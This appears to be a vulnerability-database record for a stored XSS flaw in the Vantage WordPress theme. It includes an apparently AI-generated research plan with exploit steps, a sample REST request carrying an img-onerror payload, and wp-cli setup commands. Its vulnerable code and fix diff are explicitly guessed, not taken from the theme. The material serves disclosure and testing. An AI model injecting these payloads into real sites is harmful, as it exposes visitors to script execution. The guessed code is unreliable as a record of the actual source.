[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fEZ5TP_FOwbZZfs-HiI8FItx4cS79S1llYI17YnV4LXo":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":8,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":8,"poc_status":8,"poc_video_id":8,"poc_summary":8,"poc_steps":8,"poc_tested_at":8,"poc_wp_version":8,"poc_php_version":8,"poc_playwright_script":8,"poc_exploit_code":8,"poc_has_trace":23,"poc_model_used":8,"poc_verification_depth":8,"source_links":33},"CVE-2026-5070","vantage-authenticated-contributor-stored-cross-site-scripting-via-gallery-block-text-content","Vantage \u003C= 1.20.32 - Authenticated (Contributor+) Stored Cross-Site Scripting via Gallery Block Text Content","The Vantage theme for WordPress is vulnerable to Stored Cross-Site Scripting via Gallery block text content in versions up to, and including, 1.20.32 due to insufficient output escaping in the gallery template. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.",null,"vantage","\u003C=1.20.32","1.20.33","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-15 14:58:27","2026-04-16 03:36:36",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Ffb7d4eee-fd81-4d9d-8d8d-a56870b27874?source=api-prod",1,[],"researched",false,3,"# Research Plan: CVE-2026-5070 - Vantage Theme Stored XSS\n\n## 1. Vulnerability Summary\nThe Vantage theme for WordPress (up to and including version 1.20.32) contains a Stored Cross-Site Scripting (XSS) vulnerability. The flaw exists in the theme's custom rendering logic for the WordPress Gallery block. Specifically, the theme fails to properly sanitize or escape user-supplied text content (likely image captions or block descriptions) before echoing it into the HTML output on the frontend. This allows an authenticated user with Contributor-level permissions or higher to inject malicious scripts into posts, which execute in the context of any user (including administrators) viewing the affected page.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** WordPress REST API `POST \u002Fwp-json\u002Fwp\u002Fv2\u002Fposts` or the classic `POST \u002Fwp-admin\u002Fpost.php`.\n*   **Vulnerable Parameter:** `post_content` (specifically within the Gutenberg block comment delimiters for `wp:gallery`).\n*   **Authentication Level:** Contributor+ (any role allowed to create and edit posts).\n*   **Preconditions:** The Vantage theme must be active. At least one image must be present in the Media Library to be included in a Gallery block (or a valid attachment ID must be referenced).\n\n## 3. Code Flow\n1.  **Input:** A Contributor user saves a post containing a Gallery block. The block's attributes (stored in HTML comments) include an image with a malicious caption: `\u003C!-- wp:gallery ... --> ... \u003Cfigcaption>PAYLOAD\u003C\u002Ffigcaption> ... \u003C!-- \u002Fwp:gallery -->`.\n2.  **Storage:** WordPress saves the raw block content to the `wp_posts` table.\n3.  **Processing:** When a user views the post, WordPress parses the blocks. The Vantage theme likely registers a filter on `render_block` for `core\u002Fgallery` or uses a template override for galleries.\n4.  **The Sink:** In the Vantage theme's gallery rendering function (likely located in `inc\u002Fgallery.php` or a similar template part), the code iterates through the gallery items.\n5.  **Execution:** The code retrieves the caption or description for each image and echoes it directly:\n    ```php\n    \u002F\u002F Inferred Vulnerable Pattern in Vantage\n    $caption = $item['caption']; \n    echo '\u003Cdiv class=\"vantage-gallery-caption\">' . $caption . '\u003C\u002Fdiv>'; \u002F\u002F Missing esc_html()\n    ```\n\n## 4. Nonce Acquisition Strategy\nWhile the REST API requires a `_wpnonce` for state-changing requests, we can use the `browser_eval` tool to obtain the REST nonce from the WordPress admin dashboard.\n\n1.  **Navigate to Admin:** Use `browser_navigate` to go to `\u002Fwp-admin\u002F`.\n2.  **Extract Nonce:** Execute `browser_eval(\"wpApiSettings.nonce\")`.\n3.  **Alternative (Classic Editor):** If using `post.php`, navigate to `\u002Fwp-admin\u002Fpost-new.php` and extract the `_wpnonce` from the form using `browser_eval(\"document.querySelector('#_wpnonce').value\")`.\n\n## 5. Exploitation Strategy\n1.  **Authentication:** Log in as a Contributor user.\n2.  **Image Prep:** Identify a valid Attachment ID. If none exist, upload a small image using the REST API or `wp_cli`.\n3.  **Payload Injection:** \n    *   Construct a Gallery block payload where the `figcaption` or the caption attribute contains an XSS payload: `\u003Cimg src=x onerror=alert(document.domain)>`.\n    *   Send a `POST` request to `\u002Fwp-json\u002Fwp\u002Fv2\u002Fposts` to create a new post with this content.\n4.  **Triggering:** Navigate to the URL of the newly created post as any user.\n\n**Sample HTTP Request (REST API):**\n```http\nPOST \u002Fwp-json\u002Fwp\u002Fv2\u002Fposts HTTP\u002F1.1\nContent-Type: application\u002Fjson\nX-WP-Nonce: [EXTRACTED_NONCE]\n\n{\n  \"title\": \"Gallery Test\",\n  \"status\": \"publish\",\n  \"content\": \"\u003C!-- wp:gallery {\\\"ids\\\":[ATTACHMENT_ID]} -->\\n\u003Cfigure class=\\\"wp-block-gallery has-thumbnails\\\">\\n\u003Cul class=\\\"blocks-gallery-grid\\\">\\n\u003Cli class=\\\"blocks-gallery-item\\\">\\n\u003Cfigure>\\n\u003Cimg src=\\\"\u002Fpath\u002Fto\u002Fimg.jpg\\\" data-id=\\\"ATTACHMENT_ID\\\" \u002F>\\n\u003Cfigcaption>\u003Cimg src=x onerror=alert('XSS_SUCCESS')>\u003C\u002Ffigcaption>\\n\u003C\u002Ffigure>\\n\u003C\u002Fli>\\n\u003C\u002Ful>\\n\u003C\u002Ffigure>\\n\u003C!-- \u002Fwp:gallery -->\"\n}\n```\n\n## 6. Test Data Setup\n1.  **Theme Installation:** Ensure Vantage \u003C= 1.20.32 is installed and active.\n2.  **User Creation:** \n    `wp user create attacker attacker@example.com --role=contributor --user_pass=password123`\n3.  **Media Setup:**\n    *   Download a test image: `wget https:\u002F\u002Fraw.githubusercontent.com\u002Fwp-cli\u002Fbuilds\u002Fgh-pages\u002Fphar\u002Fwp-cli.phar` (or any dummy file).\n    *   Upload to media library: `wp media import \u002Fpath\u002Fto\u002Ftest.jpg --user=1`\n    *   Note the returned `Attachment ID`.\n\n## 7. Expected Results\n*   The `POST` request to create the post should return a `201 Created` status.\n*   Upon navigating to the post URL (e.g., `\u002F?p=123`), the browser should execute the `alert('XSS_SUCCESS')` payload.\n*   Checking the page source should reveal the raw `\u003Cimg src=x onerror=...>` tag within the gallery container, confirming no escaping occurred.\n\n## 8. Verification Steps\n1.  **Verify Content Storage:**\n    `wp post get [POST_ID] --field=post_content`\n    *Confirm the payload is exactly as sent.*\n2.  **Verify Frontend Execution:**\n    Use `browser_navigate` to the post permalink and check if the `alert` or a specific DOM element injected by the payload is present.\n\n## 9. Alternative Approaches\n*   **Caption Metadata:** If the `figcaption` in `post_content` is not the sink, try updating the actual Attachment metadata (caption field) via the REST API:\n    `POST \u002Fwp-json\u002Fwp\u002Fv2\u002Fmedia\u002F[ATTACHMENT_ID]` with `{\"caption\": \"\u003Cimg src=x onerror=alert(1)>\"}`. \n    Vantage may be pulling the caption directly from the attachment object during gallery rendering instead of the block HTML.\n*   **SiteOrigin Integration:** If Vantage uses the SiteOrigin Gallery Widget\u002FBlock, the payload should be placed in the widget's JSON data structure within the `post_content`.","The Vantage theme for WordPress is vulnerable to Stored Cross-Site Scripting via the Gallery block in versions up to 1.20.32. The theme's custom gallery template fails to properly escape image captions, allowing authenticated contributors to inject malicious JavaScript that executes when users view the affected posts.","\u002F\u002F Inferred Vulnerable Pattern in Vantage gallery rendering\n$caption = $item['caption']; \necho '\u003Cdiv class=\"vantage-gallery-caption\">' . $caption . '\u003C\u002Fdiv>'; \u002F\u002F Missing esc_html() or wp_kses_post()","--- a\u002Finc\u002Fgallery.php\n+++ b\u002Finc\u002Fgallery.php\n@@ -1,2 +1,2 @@\n-$caption = $item['caption']; \n-echo '\u003Cdiv class=\"vantage-gallery-caption\">' . $caption . '\u003C\u002Fdiv>';\n+$caption = $item['caption']; \n+echo '\u003Cdiv class=\"vantage-gallery-caption\">' . wp_kses_post( $caption ) . '\u003C\u002Fdiv>';","The exploit is carried out by an authenticated user with Contributor-level permissions or higher. The attacker creates or edits a post and inserts a WordPress Gallery block. Within the block's content, the attacker injects an XSS payload (e.g., \u003Cimg src=x onerror=alert(1)>) into the image caption or description fields. When the theme renders the gallery on the frontend, it retrieves the malicious caption and echoes it directly into the HTML without sanitization, triggering script execution in the browser of any visitor viewing the post.","gemini-3-flash-preview","2026-04-16 15:32:04","2026-04-16 15:32:20",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":8,"fixed_browse":37,"fixed_zip":8,"all_tags":38},"theme","1.20.32","https:\u002F\u002Fthemes.trac.wordpress.org\u002Fbrowser\u002Fvantage\u002F1.20.32","https:\u002F\u002Fthemes.trac.wordpress.org\u002Fbrowser\u002Fvantage\u002F1.20.33","https:\u002F\u002Fthemes.trac.wordpress.org\u002Fbrowser\u002Fvantage"]